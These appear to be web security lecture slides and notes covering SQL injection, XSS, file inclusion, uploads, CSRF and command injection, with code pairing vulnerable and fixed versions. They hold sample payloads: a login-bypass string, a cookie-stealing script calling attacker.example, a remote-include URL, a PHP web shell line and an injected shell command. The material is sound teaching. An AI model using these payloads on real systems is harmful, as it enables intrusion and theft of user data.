
Slide 1

Web Security

Hello everyone. This session belongs to the BCSE lesson series. Today we will study an important
topic of information security: attacks and defenses in the web environment, that is, web security. This is
a really important part of system security.
Slide 2

Content

1 Basic knowledge

2 Popular web vulnerabilities

3 Methods of preventing and


improving

4 Exercise

Tr 2

In this lesson, we will first study basic knowledge of the web field.

Then we will look at popular web vulnerabilities: the methods hackers use to attack the system and to
attack the users of the system.
Part 3 is about methods of preventing and fixing the possible faults.
Q&A, exercise and test at the end of the lesson.
Slide 3

Basic knowledge

Tr 3

Let’s start with the first part: basic knowledge


Slide 4

General view of website system

Web server Web application Database

Tr 4

General view of a website system

A website system consists of 3 parts that execute a request: the web server, the web application, and the database.
The web server is a server running software that serves the web. It listens for requests from users,
processes them, and sends the results back to the browser. The browser displays these results to the
user.
The web application is where the server-side script or code that builds the application executes. Some
popular server-side languages are PHP, ASP.NET, JSP, Python, ...
The database is where the web application stores all of its data and performs operations through
queries. Some popular database management systems are MySQL, SQL Server and Oracle.
Moreover, there are non-relational database management systems, such as MongoDB.
Understanding the components of a website system gives us a general view from which to find the
weaknesses of the website: each component is a separate place where attacker-controlled input can end up.
Slide 5

HTTP protocol
HyperText Transfer Protocol
Protocol at the application level
Connects client and server
Used for the World Wide Web

Tr 5

Next, the HTTP protocol


HTTP is the abbreviation of HyperText Transfer Protocol. It is an application-level protocol in the OSI
model, responsible for connecting and transferring data between the web client and the web
server, and it is the protocol used for the World Wide Web (WWW).

Slide 6

HTTP Message Format


Start-Line
Header Fields
Empty Line (CRLF)
Message Body

Tr 6

We will analyze the format of an HTTP message.


There are 2 types: the HTTP Request Message (request sent by the client to the server) and the HTTP
Response Message (response sent by the server to the client).
Basically, both types consist of 4 components:
Start-Line (Request-Line for a request, Status-Line for a response)
Header Fields, providing information about the request or response
Empty Line, containing only CRLF (\r\n), which separates the headers from the body
Message Body, optional
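To make the four components concrete, here is an added example (not from the lecture slides) of a small parser for this message format. It splits a raw message at the empty CRLF line, separates the start-line from the header fields, and only trusts a body of the length the Content-Length header declares. The sample request is constructed for this example; the two strictness checks (duplicate Content-Length, Content-Length together with Transfer-Encoding) are the kind of malformed input a real server must reject rather than guess at.

```python
# Added example (not from the lecture): minimal parser for the HTTP/1.x
# message format (start-line, header fields, empty CRLF line, body).
from typing import Dict, Tuple

CRLF = b"\r\n"


def parse_http_message(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP message into (start_line, headers, body).

    Raises ValueError on messages that do not follow the format. Sloppy
    parsing of exactly these cases is what request-smuggling attacks rely on.
    """
    head, sep, body = raw.partition(CRLF + CRLF)
    if not sep:
        raise ValueError("message has no empty line terminating the headers")
    lines = head.split(CRLF)
    start_line = lines[0].decode("ascii")
    # Request-Line is "METHOD target VERSION"; Status-Line is
    # "VERSION code reason", where the reason phrase may contain spaces.
    if len(start_line.split(" ", 2)) != 3:
        raise ValueError("start line must have three parts")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        # A header name is a single token: spaces or a bare LF inside it
        # mean a malformed (or deliberately crafted) message.
        if not colon or not name or b" " in name or b"\n" in name:
            raise ValueError("malformed header line: %r" % line)
        key = name.decode("ascii").lower()  # header names are case-insensitive
        text = value.strip().decode("latin-1")
        if key in headers:
            if key == "content-length":
                raise ValueError("duplicate content-length header")
            headers[key] = headers[key] + ", " + text  # list-valued headers combine
        else:
            headers[key] = text
    if "content-length" in headers and "transfer-encoding" in headers:
        raise ValueError("ambiguous message length: both CL and TE present")
    if "content-length" in headers:
        length = int(headers["content-length"])
        if length < 0 or length > len(body):
            raise ValueError("content-length does not match the body")
        body = body[:length]
    return start_line, headers, body


def request_line(start_line: str) -> Tuple[str, str, str]:
    """Decompose a Request-Line into (method, request-target, version)."""
    method, target, version = start_line.split(" ", 2)
    return method, target, version


def status_line(start_line: str) -> Tuple[str, int, str]:
    """Decompose a Status-Line into (version, status code, reason phrase)."""
    version, code, reason = start_line.split(" ", 2)
    return version, int(code), reason


# Constructed sample request: a login form submission with a session cookie.
SAMPLE_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Cookie: session=abc123\r\n"
    b"Content-Length: 27\r\n"
    b"\r\n"
    b"username=alice&password=pw1"
)

if __name__ == "__main__":
    start, hdrs, body = parse_http_message(SAMPLE_REQUEST)
    print(request_line(start), hdrs, body)
```

Header names are lower-cased before use because HTTP treats them case-insensitively; forgetting that is a common way for a filter on `Cookie` or `Authorization` to be bypassed with `cookie` or `AUTHORIZATION`.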
Slide 7

HTTP Request Methods


GET/POST
HEAD
PUT
DELETE
CONNECT
OPTIONS
TRACE

Tr 7

Requests are sent by the client to the server using a specific method.


HTTP/1.1 defines 8 request methods: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE
(PATCH was added later by RFC 5789).
Let's pay attention to the 2 most popular methods, GET and POST. The GET method is used to
retrieve the resource identified by a URI; the POST method is used to send data to the
server, for example account information or the content of an uploaded file.
Slide 8

HTTP Status Code


1xx: Informational
2xx: Success
3xx: Redirection
4xx: Client Error
5xx: Server Error

Tr 8

HTTP Status Code

The status code belongs to the response. It consists of 3 digits: the first digit defines the
class of response, the remaining 2 digits give the specific meaning.
Codes starting with 1: informational, the request was received and is being processed.
Codes starting with 2: the request was accepted and handled successfully.
Codes starting with 3: further action is needed to complete the request, for example a redirect
(302).
Codes starting with 4: client error, the request is malformed or cannot be
fulfilled.
Codes starting with 5: server error, the server failed to process a valid request.
Slide 9

Cookie
HTTP cookie, Web cookie, Browser
cookie
A small piece of data saved in the user's
browser
Size about 4 KB
Stores state or information about the actions
of the user

Tr 9

Next, cookies.
It sounds like a cake, but it is not.
A cookie, also called an HTTP cookie, web cookie or browser cookie, is a small piece of data (about
4 KB in size) sent from the web server to the browser and stored in that browser when the user accesses
the website. It is used to store state or the actions of the user (for example, whether the user has visited
the website before, how many times the user has visited, which products are in the basket, ...). Because the
session identifier is usually kept in a cookie, stealing or replaying a cookie means taking over the user's session.
Slide 10

Popular web vulnerability

Tr 10

The next part is about web vulnerabilities.


Slide 11

SQL Injection (1)


This is a technique that enables an attacker
to take advantage of missing input
validation in a web application (and of
database error messages that are sent
back to the client) to inject and execute
arbitrary SQL commands

Tr 11

The most familiar and dangerous vulnerability is SQL Injection. This is a technique that enables an
attacker to take advantage of missing input validation in a web application, and of database error
messages that are sent back to the client, to inject and execute arbitrary SQL
commands.
This fault typically occurs in web applications whose data is managed by a database management
system such as SQL Server, MySQL or Oracle.
Slide 12

SQL Injection (2)


Threats:
 Enable attackers to insert, modify and
delete data in the application's
database.
 Install a webshell on the system and gain
control of the server.

Tr 12

Exploiting SQL Injection can enable attackers to insert, modify and delete data in the application's
database. More dangerously, an attacker can install a webshell on the system and gain control of the
server; this requires the database account to have file-write privileges (for example MySQL's INTO OUTFILE
or MSSQL's xp_cmdshell), which is why the database account should be granted the least privilege possible.
Slide 13

SQL Injection (3)


Example

Tr 13

Let's consider a typical example: bypassing a login form.


As you can see on the screen, the server builds a SELECT ... FROM ... WHERE query from the
2 input fields, with no filtering mechanism at all.
With a small trick, entering a value such as ' or 1=1 -- in the user-id field, the hacker closes the quoted
string, makes the WHERE condition always true and comments out the rest of the query, and so easily
bypasses the login form to get inside.
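Here is the login-bypass scenario as an added example (not the lecture's own code), run against an in-memory SQLite database that this example constructs. The vulnerable version pastes the two inputs into the query text, the safe version passes them as query parameters; the user names, passwords and payload are made up for the demonstration.

```python
# Added example (not from the lecture): SQL injection login bypass,
# vulnerable string concatenation beside a parameterised query.
import sqlite3

# Classic payload: closes the quoted string, makes the condition always
# true, and comments out the password check (SQLite, MySQL and MSSQL all
# accept "--" as a line comment; MySQL needs the trailing space).
BYPASS = "' OR 1=1 --"


def make_db() -> sqlite3.Connection:
    """Constructed users table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret')")
    conn.execute("INSERT INTO users (username, password) VALUES ('alice', 'hunter2')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The two inputs become part of the SQL text: "no filtering mechanism".
    query = ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised query: values travel separately from the SQL text, so a
    # quote in the input is data and can never change the query structure.
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, bypass payload:", login_vulnerable(conn, BYPASS, "anything"))
    print("safe, bypass payload:     ", login_safe(conn, BYPASS, "anything"))
```

With the payload in the username field the vulnerable query becomes `SELECT id FROM users WHERE username = '' OR 1=1 --' AND password = 'anything'`, which returns every user; the first row returned is usually the administrator, since that account tends to be created first.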
Slide 14

SQL Injection (4)


Types of exploitation
 Boolean-based blind
 Time-based blind
 Error-based
 UNION query-based
 Stacked queries

Tr 14

Following the classification used by sqlmap, a free and effective tool for detecting and exploiting
SQL Injection, there are 5 main techniques for exploiting SQL Injection: Boolean-based
blind, time-based blind, error-based, UNION query-based and stacked queries.
Firstly, Boolean-based blind: the principle of this technique is to ask true/false questions and compare
the two responses in order to recover, character by character, information such as table names, column names, etc.
Because the search space is large, this kind of exploitation is mainly done with a tool.
Time-based blind: this technique relies on the server's processing time for different requests (for
example a conditional sleep) to determine each character of a table or column name.
Next, error-based: this relies on the error messages of the database management system. This
technique can only be used when the web application is configured to show the error messages of the
database management system.
Fourthly, UNION queries. This is a popular method when exploiting SQL Injection. Its principle
is to use the UNION keyword to append the results of an attacker-chosen SELECT to the results of the
original one, and so read information from the database in the normal response.
The last one is stacked queries, also called piggy-backing. By adding the character ; (the statement
separator in SQL), we can execute several SQL commands in a single request,
for example SELECT * FROM products WHERE productid=1; DELETE FROM products. This only works when the
database driver allows multiple statements per call.
Slide 15

SQL Injection (5)


Basic steps of exploitation
 Detect
 Collect information about database
management system
 Determine number of column in SELECT
clause
 Determine name of table and column
 Determine content stored in database
Tr 15

Basic steps of exploitation:


Detect: use special characters such as the apostrophe, quotation mark, semicolon, etc. If an
error message appears, SQL injection may be possible. Once the application is detected as
vulnerable to SQL Injection, you need to collect information about its database management system,
including the type of database (MySQL, MSSQL, Oracle, ...) and its version.
Depending on the type and version of the database management system used by the application, we
apply different exploitation techniques. A simple example of the differences between database
management systems is the comment syntax: MSSQL comments out the rest of a line with '--', while MySQL
accepts '-- ' (with a trailing space) and '#', and both accept '/* ... */'.
Determine the number of columns in the SELECT clause: when exploiting SQL Injection, we usually add
one or more sub-SELECT clauses through the UNION keyword. UNION is a keyword that combines the
results of several SELECT clauses, so each SELECT clause must return the same number of columns as the
original SELECT clause (which is commonly found by adding NULL columns one at a time until the error disappears).
Determine the names of tables and columns: in order to exploit SQL Injection, we need to know some
information about the database, such as the names of tables, the names of columns and the data type of each
column. This stage usually takes a considerable amount of time.
The last step is to read the content stored in the database.
Slide 16

XSS (1)
Cross-Site Scripting
This technique enables a hacker to insert
malicious script into a website that has
the vulnerability

Tr 16

Let's move to the second vulnerability: XSS. Cross-Site Scripting is a technique which enables a
hacker to insert malicious script into a website, so that it runs in the browsers of the website's users.
Slide 17

XSS (2)
Threats
 End users' information gets stolen
 The admin account is taken over
 Offensive images are inserted into the website
(defacement), damaging its reputation

Tr 17

XSS enables a hacker to execute malicious script in the user's browser. This allows the user's
information to be stolen, the administrator account of the administration page to be taken over, and the
website to be defaced with offensive images, which damages the reputation of the company or organization.
Slide 18

XSS (3)
Exploits
 Reflected XSS
 Stored XSS
 DOM Based XSS

Tr 18

In general, XSS is divided into three main types: Reflected XSS, Stored XSS and DOM-based XSS.
Slide 19

XSS (4)
Reflected XSS

Tr 19

The first is Reflected XSS. There are many ways to exploit Reflected XSS; one of them is to
hijack the user's session, and then access their data and act with their permissions on the website.
Look at the screen. This is the scenario of a Reflected XSS attack.
First, the user logs in to the website and is given a session. By some means, the hacker sends the
user an exploitation URL. The victim opens this URL; the server responds to the victim with the
data from the request (the hacker's JavaScript) reflected into the page. The victim's browser executes the
JavaScript, and the victim's session cookie is sent to the hacker. The hacker can then impersonate the victim
and do everything the victim is allowed to do on the website.
Slide 20

XSS (5)
Stored XSS

Tr 20

The second is a more dangerous type: Stored XSS.


While Reflected XSS targets the specific victims chosen by the hacker, Stored XSS reaches many more
victims. This fault occurs when the web application does not check input data carefully before
storing it in the database (I use this term here to refer to the database, files or any other area used to
store the data of the web application). Examples are suggestion forms, comments, ... on websites.
With Stored XSS, the hacker does not exploit the victim directly; he has to proceed in at least 2
steps.
First, the hacker takes advantage of input points (form, input, textarea, ...) which are not
checked carefully to insert the malicious code into the database.
Next, when a user accesses the web application and performs an operation that displays the stored
data, the hacker's code is executed in the user's browser.
Slide 21

XSS (6)
Stored XSS

Tr 21

The exploitation scenario is described by this image.


There are 2 big differences in the attack process between Reflected XSS and Stored XSS.
First, in order to exploit Reflected XSS, the hacker has to trick the victim into opening
his URL. With Stored XSS this step is not needed: after inserting the malicious code into the
database of the application, the hacker only needs to wait for victims to visit the page on their own. For the
victim this looks absolutely normal, because they do not know that the content they are viewing is
dangerous.
Second, the hacker reaches his target more easily if, at the moment of the attack, the victim is
logged in to the web application. With Reflected XSS, the hacker has to persuade or trick the victim into logging in
and then opening the URL he provides in order to execute the malicious script. Stored XSS is different:
because the script is stored in the web application's database, it is executed whenever a user accesses the
affected function, and such functions usually require authentication (login) first, so it is almost
certain that at that moment the user is in an active session.
Therefore, we can see that Stored XSS is more dangerous than Reflected XSS: the affected users
can be all users of the web application. And if a victim has the administrator role, control of
the website can be taken over.
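As an added example (not the lecture's own code), here is a comment renderer for the stored XSS scenario above in its vulnerable and hardened forms; it also illustrates the "encode data sent back" rule from the solutions part of this lesson. The stored comments and the HTML template are constructed here. Note the second half of the fix: HTML-escaping protects the text and attribute contexts, but a link target also needs a scheme allowlist, because `javascript:alert(1)` survives escaping unchanged and still runs when clicked.

```python
# Added example (not from the lecture): stored XSS, concatenating stored
# data into HTML versus context-aware output encoding plus URL validation.
import html
from urllib.parse import urlparse

# Constructed: imagine these rows came back from the comments table. The
# second one was submitted by an attacker through an unchecked form.
STORED_COMMENTS = [
    {"author": "alice", "text": "Nice article!", "site": "https://alice.example"},
    {"author": "<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
     "text": "great", "site": "javascript:alert(document.cookie)"},
]

TEMPLATE = '<div class="comment"><a href="%s">%s</a>: %s</div>'


def render_unsafe(comment: dict) -> str:
    # Stored data is pasted straight into the page: whatever was submitted
    # is now part of the HTML every visitor's browser parses.
    return TEMPLATE % (comment["site"], comment["author"], comment["text"])


def safe_url(url: str) -> str:
    # Escaping alone does not help inside href: "javascript:" is a valid,
    # fully escaped attribute value that still executes on click.
    parsed = urlparse(url)
    if parsed.scheme in ("http", "https") and parsed.netloc:
        return html.escape(url, quote=True)
    return "#"  # refuse anything that is not a plain web URL


def render_safe(comment: dict) -> str:
    # Encode for the HTML text context; quote=True also covers attributes.
    return TEMPLATE % (
        safe_url(comment["site"]),
        html.escape(comment["author"], quote=True),
        html.escape(comment["text"], quote=True),
    )


def contains_script(fragment: str) -> bool:
    # Coarse check used only to compare the two renderers in this example.
    return "<script" in fragment.lower()


if __name__ == "__main__":
    for c in STORED_COMMENTS:
        print(render_unsafe(c))
        print(render_safe(c))
```

The safe renderer never rejects the attacker's comment; it simply makes sure the browser displays the `<script>` text instead of executing it. Input validation at submission time is still worthwhile, but output encoding is the control that holds even when a bad record is already in the database.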
Slide 22

XSS (7)
DOM based XSS

Tr 22

Another type of XSS exploitation is DOM-based XSS.


First, we need to know the definition of the DOM. DOM is the abbreviation of Document Object Model,
a W3C standard for accessing and manipulating structured documents such as HTML and
XML. This model represents the document as a hierarchical tree structure; every element of the
HTML or XML document is a node.
DOM-based XSS is an XSS technique that exploits changes to the DOM structure of the document,
specifically the HTML, made by client-side script.
The exploitation scenario is shown in this image.
This image gives us 2 important conclusions. First, the malicious script is executed immediately when
the value in the select element is clicked, meaning it runs on the client without any response from the
server: the payload never needs to reach the server at all. Second, the HTML structure is changed by script. And in
practical exploitation scenarios, DOM-based XSS is more similar to Reflected than to Stored XSS, because it
requires tricking the user into opening a URL carrying the malicious payload.
Slide 23

Insecure File Handling


File Inclusion
Insecure File Uploads

Tr 23

To continue, we will move to the errors related to unsafe handling of files, including File Inclusion
and Insecure File Upload.
Slide 24

File Inclusion (1)

Tr 24

File Inclusion
This is a popular vulnerability in web applications that enables a hacker to read sensitive files on the
server. More dangerously, the hacker can use Log Poisoning to get a web shell onto the server: he first writes
code into a server log file (for example through the User-Agent header) and then includes that log file.
Slide 25

File Inclusion (2)


Local File Inclusion
Remote File Inclusion

Tr 25

There are 2 types of File Inclusion: Local File Inclusion and Remote File Inclusion.
LFI is a technique for reading files on the web server itself. The hacker can read a lot of sensitive
information on the server, such as /etc/passwd, php.ini, ...
The second type is RFI, a technique for including a file from another server; the content of
that file can contain malicious code (a web shell, ...).
Slide 26

Insecure File Upload

Tr 26

Another vulnerability is Insecure File Upload.


This vulnerability allows dangerous files to be uploaded to the server, either without any control
mechanism or with a loose one (for example a check on the file extension that can be bypassed).
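The two unsafe file-handling patterns above, as an added example that is not part of the lecture: an include that takes a page name from the request, first with no check and then confined to the template directory, and an upload that validates the client-supplied name against an allowlist and generates the on-disk name itself. The directory layout, file names and contents are constructed in a temporary directory by this example.

```python
# Added example (not from the lecture): local/remote file inclusion and
# insecure upload, vulnerable and hardened forms side by side.
import os
import re
import tempfile
from pathlib import Path


def include_vulnerable(base_dir: str, page: str) -> str:
    # os.path.join follows "../" and even discards base_dir for absolute paths.
    with open(os.path.join(base_dir, page)) as f:
        return f.read()


def include_safe(base_dir: str, page: str) -> str:
    base = Path(base_dir).resolve()
    if "://" in page:  # http://, php://filter, ... : no remote or wrapper includes
        raise ValueError("remote include refused")
    target = (base / page).resolve()
    # The resolved path must stay strictly inside the template directory.
    if base not in target.parents:
        raise ValueError("path traversal refused: %s" % page)
    return target.read_text()


ALLOWED_EXT = {".png", ".jpg", ".pdf"}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def upload_safe(upload_dir: str, client_name: str, data: bytes) -> str:
    # Drop any directory component the client sent, allowlist the extension,
    # reject double extensions such as shell.php.png, and choose the stored
    # name ourselves so the client never controls the path on disk.
    ext = Path(client_name).suffix.lower()
    stem = Path(client_name).stem
    if ext not in ALLOWED_EXT or not SAFE_STEM.match(stem):
        raise ValueError("upload refused: %s" % client_name)
    name = "%s_%s%s" % (stem, os.urandom(4).hex(), ext)
    dest = Path(upload_dir).resolve() / name
    dest.write_bytes(data)
    return name


def demo() -> dict:
    """Constructed layout: templates/home.html, plus a secret file one level up."""
    root = tempfile.mkdtemp()
    tpl = Path(root, "templates")
    tpl.mkdir()
    (tpl / "home.html").write_text("<h1>home</h1>")
    Path(root, "secret.txt").write_text("db_password=hunter2")
    uploads = Path(root, "uploads")
    uploads.mkdir()

    results = {"vuln_leak": include_vulnerable(str(tpl), "../secret.txt"),
               "safe_ok": include_safe(str(tpl), "home.html")}
    for key, page in (("traversal", "../secret.txt"), ("remote", "http://attacker.example/shell.txt")):
        try:
            include_safe(str(tpl), page)
            results[key] = "included"
        except ValueError:
            results[key] = "refused"
    results["upload_name"] = upload_safe(str(uploads), "avatar.png", b"\x89PNG")
    for key, name in (("php", "../../shell.php"), ("double", "shell.php.png")):
        try:
            upload_safe(str(uploads), name, b"<?php system($_GET['c']); ?>")
            results[key] = "stored"
        except ValueError:
            results[key] = "refused"
    return results


if __name__ == "__main__":
    print(demo())
```

Checking the extension is necessary but not sufficient: the upload directory should also be served without script execution, since a renamed file is still executed if the web server hands `.png` to a PHP handler through a misconfiguration.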
Slide 27

CSRF (1)
One-click attack, session riding, XSRF
A type of attack which tricks the end
user into performing unintended actions
on a web application

Tr 27

CSRF, also called one-click attack, session riding or XSRF, is a type of attack which tricks the end
user into performing unintended actions on a web application in which they are authenticated.
Slide 28

CSRF (2)
Threats
 User implement unexpected queries
without awareness
 Lose data
 Lose money
 Affect image and reputation of users
 …

Tr 28

When a website is vulnerable to CSRF, the threats are as follows:


Users perform unintended requests without being aware of it
Loss of data
Loss of money
Damage to the image and reputation of users
Now we will consider an example of a CSRF vulnerability.
Slide 29

CSRF (3)
Example:
 A wants to transfer money to B
through Internet Banking service at
website ebanking.vn
 URL for implementing this request is:
http://ebanking.com/transfer.do?acct
=B&amount=100

Tr 29

- A wants to transfer money to B through the Internet Banking service at the website ebanking.vn


- The URL that performs this request is: http://ebanking.com/transfer.do?acct=B&amount=100
Slide 30

CSRF (4)
Examples:
 By some means, C learns the structure
of this URL, and C modifies it to
http://ebanking.com/transfer.do?acct=C&
amount=100
 C tricks A into sending this request (while
A is logged in)
 C gains 100$ !

Tr 30

- By some means, C learns the structure of this URL, and C modifies it to:
http://ebanking.com/transfer.do?acct=C&amount=100
- C tricks A into sending this request (while A is logged in)
- C gains 100$
To trick A into sending this request, C can for example send the URL through email or
Facebook; today most shared URLs are shortened, so the victim cannot tell what the link really points to.
Slide 31

CSRF (5)
Analysis of causes:
 Web application often manages users
through cookie
 Web browser automatically attaches
cookie to requests sent to
http://bank.vn, anyone sends this
request.

Tr 31

- Web applications usually manage users through a cookie

- The web browser automatically attaches the cookie to every request sent to
http://bank.vn, no matter which page or site caused the request to be sent.
Slide 32

CSRF (6)
Analysis of causes
 If http://bank.vn has no mechanism to
identify request sent from
http://attacker.vn, attacker will have
entire control right for user’s session

Tr 32

If http://bank.vn has no mechanism to distinguish a request that originated from
http://attacker.vn from one the user sent deliberately, the attacker can perform any action
within the user's session.
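An added example (not from the lecture) of the money-transfer handler for the bank scenario above, first relying on the session cookie alone, then adding the two checks that let the server tell a request the user meant to send from one an attacker's page triggered: a per-session CSRF token that only the bank's own pages can embed, and an Origin header check. The session store, request object, account names and origins are constructed for this example.

```python
# Added example (not from the lecture): CSRF, cookie-only authorisation
# versus a synchroniser token plus Origin check.
import hmac
import secrets
from dataclasses import dataclass, field

SESSIONS = {}  # constructed session store: session id -> {"user", "csrf"}
SITE_ORIGIN = "https://bank.vn"


def login(user: str) -> str:
    """Create a session and a CSRF token bound to it; returns the cookie value."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_hex(16)}
    return sid


def csrf_token_for(sid: str) -> str:
    # The bank's own transfer form embeds this as a hidden field. A page on
    # attacker.vn cannot read it, so it cannot build a request that carries it.
    return SESSIONS[sid]["csrf"]


@dataclass
class Request:
    cookies: dict
    form: dict
    headers: dict = field(default_factory=dict)


def transfer_vulnerable(req: Request) -> str:
    # Only the cookie is checked, and the browser attaches it to any request
    # aimed at the bank, whichever site built that request.
    sess = SESSIONS.get(req.cookies.get("session"))
    if sess is None:
        return "401 not logged in"
    return "200 %s sent %s to %s" % (sess["user"], req.form["amount"], req.form["acct"])


def transfer_safe(req: Request) -> str:
    sess = SESSIONS.get(req.cookies.get("session"))
    if sess is None:
        return "401 not logged in"
    # Browsers add Origin to cross-site POSTs; when present it must be ours.
    origin = req.headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return "403 cross-origin request"
    # The token must match the one bound to this session (constant-time compare).
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), sess["csrf"].encode()):
        return "403 missing or wrong CSRF token"
    return "200 %s sent %s to %s" % (sess["user"], req.form["amount"], req.form["acct"])


if __name__ == "__main__":
    sid = login("A")
    forged = Request({"session": sid}, {"acct": "C", "amount": "100"},
                     {"Origin": "https://attacker.vn"})
    print(transfer_vulnerable(forged))
    print(transfer_safe(forged))
```

Two further points a practitioner would add: state-changing operations should be POST rather than a GET URL like the one in the slide, since a GET can be triggered by a plain `<img>` tag, and the session cookie should carry the `SameSite` attribute so the browser itself stops attaching it to cross-site requests.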
Slide 33

OS Command Injection

Tr 33

OS Command Injection Vulnerability


This vulnerability occurs when a hacker manages to execute operating system commands through a
web vulnerability. If an application uses data entered by the user as part of an operating system command
(for example a ping or lookup feature built by concatenating a command string), it is likely to have this flaw.
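An added example (not the lecture's own code) of a host-lookup feature of the kind just described, written three ways: a command string handed to the shell, the same command as an argument list, and the argument list behind a hostname allowlist. `echo` stands in for the real command so that the example runs anywhere; the host names and the injected payload are constructed here.

```python
# Added example (not from the lecture): OS command injection through a
# shell command string, and the argv-list plus validation fix.
import re
import subprocess

# RFC-style hostname characters only; anything else is rejected up front.
HOSTNAME = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def lookup_vulnerable(host: str) -> str:
    # User data becomes part of a shell command line, so the shell interprets
    # ";", "|", "&&", "$(...)" and backticks inside it.
    out = subprocess.run("echo " + host, shell=True, capture_output=True, text=True)
    return out.stdout


def lookup_argv(host: str) -> str:
    # No shell involved: the value is one argv element, so shell
    # metacharacters in it are just characters passed to the program.
    out = subprocess.run(["echo", host], shell=False, capture_output=True, text=True)
    return out.stdout


def lookup_safe(host: str) -> str:
    # Defence in depth: validate against an allowlist as well, so the value
    # cannot smuggle options (e.g. a leading "-") into the called program.
    if not HOSTNAME.match(host):
        raise ValueError("invalid host name: %r" % host)
    return lookup_argv(host)


def output_lines(output: str) -> list:
    """Non-empty lines of a command's output, for comparing the three variants."""
    return [line for line in output.splitlines() if line]


if __name__ == "__main__":
    payload = "example.test; echo INJECTED"  # constructed attacker input
    print("shell string:", output_lines(lookup_vulnerable(payload)))
    print("argv list:   ", output_lines(lookup_argv(payload)))
```

With the payload above, the shell version runs two commands and prints two lines, the argv version prints the payload back as a single literal line, and the validated version refuses it before anything runs. The allowlist matters even with argv: programs like `ping` interpret a leading `-` as an option, which an attacker can use to change behaviour without any shell at all.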
Slide 34

SOLUTIONS

The next part of the lesson covers solutions and the prevention of threats from web vulnerabilities.
Slide 35

Solutions
Secure programming
 Strictly validate user input
 on the client
 on the server
 Encode data sent back to the browser
 Re-authenticate important operations,
for example a transfer

Tr 35

Firstly, secure programming


- Strictly validate user input, on the client and on the server. Client-side checks only improve usability;
they can be bypassed by anyone who edits the request, so the server must validate again.
- Encode data sent back to the browser, according to the context (HTML text, attribute, URL) it is inserted into
- Re-authenticate important operations, for example a transfer
Slide 36

Solutions
System configuration
 Set strong passwords
 Never keep default settings
 Grant minimum permissions to users and to
the system

Tr 36

System configuration


- Set strong passwords
- Never keep default settings (default credentials, sample applications, verbose error pages)
- Grant minimum permissions to users and to the accounts the application and database run under
Slide 37

Solutions
Update software and services to the latest version
Close unnecessary services on the system

Tr 37

Update software and services to the latest version, so that known vulnerabilities are patched


Close unnecessary services on the system, to reduce the attack surface
Slide 38

Exercise

Tr 38

In the last part, we move to the exercise.


Slide 39

Requirements:
• Access the address:
128.199.140.34:1337
• Exploit the following
vulnerabilities: SQL injection, XSS, LFI

Tr 39

Requirements:
Access the address on the slide
Exploit the following vulnerabilities: SQL injection, XSS, LFI
Slide 40

Thank you for your attention

Tr 40
